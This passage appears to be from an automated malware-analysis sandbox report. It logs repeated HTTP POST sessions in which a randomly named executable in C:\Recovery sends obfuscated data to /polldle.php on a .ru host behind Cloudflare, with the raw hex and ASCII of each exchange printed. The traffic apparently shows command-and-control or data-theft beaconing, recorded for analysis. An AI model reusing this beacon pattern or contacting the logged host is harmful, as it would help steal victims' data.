                                                                                Data Ascii: ]^QTZIZ\T]UZPUY[PVZRWQP^[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#@-#%%;8[%"%Y3? ?6/;+_+3V%U:.B<\"! <#X'/\/
                                                                                Jan 11, 2025 23:33:53.690061092 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:53.926211119 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:53 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cqi3IrjMF2sjOHP1mqgDRhWGzifjx2naGskgo9WaeRqicSB8b%2Fq7rNBRQzHWCR%2FA5HLNulWGBojLOTEP4x5utPwPAjixYMFG6pnzydXSp2urFzg4zM%2Bo3RLAjctJgA2cebh0DAlG"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085efe48ed4315-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4381&min_rtt=2056&rtt_var=5421&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=70674&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                75 | 192.168.2.4 | 50083 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:54.060024977 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:54.411317110 CET | 2504 | OUT | Data Raw: 58 59 54 5f 5f 44 5a 5e 54 5d 55 5a 50 5e 59 50 50 5d 5a 5e 57 53 50 58 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XYT__DZ^T]UZP^YPP]Z^WSPX[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU .#E%+8%T&'/! ,58+X+?423*T.78!X?#X'/\/,
                                                                                Jan 11, 2025 23:33:54.505692959 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:54.757345915 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:54 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HF65MiuEEtOwV7556PcbUkS81xr%2F%2F1%2BNBi79rojnFio436eOw2sUpQW66e4ipE9uSzu3mWEcsDXvj5kwD08u90CQfqT1wPRteK9SSt8v8iIbYJjrYnq3Cv8ymNWdvmsh3XX60JfO"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f03691b8cdd-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3401&min_rtt=2057&rtt_var=3460&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=113946&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                76 | 192.168.2.4 | 50084 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:54.885668993 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:55.239278078 CET | 2504 | OUT | Data Raw: 58 5e 54 57 5a 41 5a 5f 54 5d 55 5a 50 5b 59 58 50 50 5a 5f 57 56 50 5d 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X^TWZAZ_T]UZP[YXPPZ_WVP][\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU 9#6A28Y%>$1S#%8+$(?&U5,4;#2]<5#X'/\/
                                                                                Jan 11, 2025 23:33:55.329160929 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                77 | 192.168.2.4 | 50085 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:55.339828968 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1620
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:55.692326069 CET | 1620 | OUT | Data Raw: 5d 5e 54 5f 5f 42 5a 51 54 5d 55 5a 50 5b 59 5b 50 5c 5a 59 57 50 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]^T__BZQT]UZP[Y[P\ZYWPPZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#-3)$;/$!!Y'5V"?:,;??2&S- Z!!;+5#X'/\/
                                                                                Jan 11, 2025 23:33:55.788103104 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:56.023619890 CET | 956 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:55 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kFxzWqZ989xdyDk%2BpdYZl8eHuHpXsHhTGR6zYH3VIi2MXxmzG%2BYkPvuq81gLjiY6xRyy%2FMxUiKFlMhYBZCoNFhAXXcZ%2BDoORsEnfizZgV9gTaZ1CklKC4gTUfTE1c5ScJSXdYwbO"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f0b6e3e42f2-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3470&min_rtt=2160&rtt_var=3430&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1939&delivery_rate=115488&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2d 0a 27 24 38 5b 29 07 2f 59 2d 06 0e 01 39 0f 0e 58 3d 0f 07 06 37 3a 38 13 31 31 23 0f 3c 5c 21 42 28 14 06 08 37 3d 3e 1c 26 13 23 46 0c 1d 21 01 3e 06 30 56 31 02 20 59 3f 55 29 04 25 31 20 45 3e 1a 37 50 3f 29 32 01 35 3c 35 0d 2b 0c 39 57 2a 35 31 02 38 31 33 5a 25 10 2e 51 0f 16 21 51 22 0f 20 16 23 3d 33 5c 25 20 0d 1c 28 37 38 59 26 2a 28 50 2b 23 03 03 28 22 01 0f 27 3e 23 1f 31 3f 04 19 3c 2a 3c 0e 2b 01 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 98-'$8[)/Y-9X=7:811#<\!B(7=>&#F!>0V1 Y?U)%1 E>7P?)25<5+9W*51813Z%.Q!Q" #=3\% (78Y&*(P+#("'>#1?<*<+$\#(V?[M0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                78 | 192.168.2.4 | 50086 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:55.459971905 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:55.817405939 CET | 2504 | OUT | Data Raw: 58 5a 51 54 5a 45 5f 5a 54 5d 55 5a 50 5b 59 5f 50 53 5a 59 57 54 50 5e 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XZQTZE_ZT]UZP[Y_PSZYWTP^[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#B, 5&<2T)0?U#/%,7+?V% .T:(]!<(5#X'/\/
                                                                                Jan 11, 2025 23:33:55.922291994 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:56.143770933 CET | 819 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:56 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eMuSadz%2B0DaCokUNTlbH27Tp2MMwj%2FwNC%2FIJz2iVDv41rh6ZKTihf%2B5%2FZz%2BDWSUgv1INfBSR%2Bn61Moc2tH7QsOk%2BOtEYElA5vV4fNiEolRqiMCSiUlCmh%2B%2BYNlvuIHOUlUPBbBzj"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f0c3c44de94-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7940&min_rtt=1548&rtt_var=13366&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=27709&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                79 | 192.168.2.4 | 50087 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:56.271917105 CET | 295 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2500
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:33:56.629878044 CET | 2500 | OUT | Data Raw: 58 5b 54 56 5f 43 5a 5f 54 5d 55 5a 50 5c 59 5f 50 57 5a 58 57 50 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X[TV_CZ_T]UZP\Y_PWZXWPPZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#.%( &"*'?!U4"/4(&3&:$#1#?#X'/\/
                                                                                Jan 11, 2025 23:33:56.734268904 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:56.908221006 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:56 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qh%2Fhpb6O14KUbO6mQHFx0dgjlfujTCXEGzaBGX3PdFh%2BXQD8hwgm42W7JQ9cL9dHUHaFOCsv%2FNdFfyJnpoUMOiL9%2FJ2d6ubwUDYoVslG9Zog7jBKRGdCy4DpaTcRIQRsoKTS5iE0"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f1149b80c9c-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4109&min_rtt=1559&rtt_var=5686&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2795&delivery_rate=66469&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                80 | 192.168.2.4 | 50088 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:57.117902040 CET | 295 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:33:57.473679066 CET | 2504 | OUT | Data Raw: 5d 5d 54 54 5a 41 5a 5d 54 5d 55 5a 50 5e 59 51 50 51 5a 5b 57 55 50 58 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]]TTZAZ]T]UZP^YQPQZ[WUPX[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#F.U&%8 Y1>'.#?&8;/++R$#-:;#"<#X'/\/,
                                                                                Jan 11, 2025 23:33:57.756728888 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:57.756763935 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:57 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v%2F7AD6Ml92n5yfuI37Cz86hOra2SXtt4jqniTmy9WXOQju1KcUIQpqmv77wFD%2BMT8c49UlvBT7H2kcPUPadcmMfmrP%2B465RyFxVrOPOgGPN6g6lB3fsn7idGB%2FjRGBbLAcYt8bpp"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f168c6a4363-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2266&min_rtt=1810&rtt_var=1590&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=267497&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0
                                                                                Jan 11, 2025 23:33:57.756782055 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:57 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v%2F7AD6Ml92n5yfuI37Cz86hOra2SXtt4jqniTmy9WXOQju1KcUIQpqmv77wFD%2BMT8c49UlvBT7H2kcPUPadcmMfmrP%2B465RyFxVrOPOgGPN6g6lB3fsn7idGB%2FjRGBbLAcYt8bpp"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f168c6a4363-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2266&min_rtt=1810&rtt_var=1590&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=267497&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                81 | 192.168.2.4 | 50089 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:57.880202055 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2500
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:58.239306927 CET | 2500 | OUT | Data Raw: 5d 5c 51 54 5a 41 5f 5f 54 5d 55 5a 50 5c 59 5a 50 5c 5a 5e 57 55 50 5c 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]\QTZA__T]UZP\YZP\Z^WUP\[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU -.C23&"=0?)W <=^;8<)?U%&.B<53[*%#X'/\/,
                                                                                Jan 11, 2025 23:33:58.341049910 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:58.610297918 CET | 810 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:58 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=94%2B%2BMTp3vl8qV3y8Ow9neIq%2BthSXmSbW%2BMNBXebVNfYyiwUKRaw5RWxAhIdVJJ%2FVaK5CdAm5RcbyjjbeFDPgF0VWqnuC8MP01Qn9402f0EJovwj9zgL21LfN1bX%2FZlgSjVG7wH8b"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f1b59767c9f-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4856&min_rtt=2041&rtt_var=6396&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2819&delivery_rate=59436&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                82 | 192.168.2.4 | 50090 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:58.819713116 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:59.176841974 CET | 2504 | OUT | Data Raw: 5d 5c 54 5f 5a 46 5a 58 54 5d 55 5a 50 55 59 51 50 56 5a 59 57 56 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]\T_ZFZXT]UZPUYQPVZYWVPZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#F:02%3%22$1V4*,+?&06,$76 ?#X'/\/
                                                                                Jan 11, 2025 23:33:59.264226913 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:59.471590996 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:59 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nXvNy9Hufye%2BzTGNjg3PVVrZrummd4A5o8rSlSPCb2wHbbaDPjx%2FqSnwMgCLfmx5AoIOADWCBKW%2BbCLJ5H5GPZBu2WptU86bDUN1MafVIJJq7rtF79BRCZ4%2BdY81bqB93EzMxR0x"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f212c677cea-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2499&min_rtt=1888&rtt_var=1930&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=215466&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                83 | 192.168.2.4 | 50091 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:59.601856947 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:59.957998037 CET | 2504 | OUT | Data Raw: 5d 5a 54 53 5a 42 5f 5b 54 5d 55 5a 50 5f 59 58 50 56 5a 5d 57 5d 50 5f 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]ZTSZB_[T]UZP_YXPVZ]W]P_[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU -510]25$*",_/'(?1*V-4\!3\<5#X'/\/(
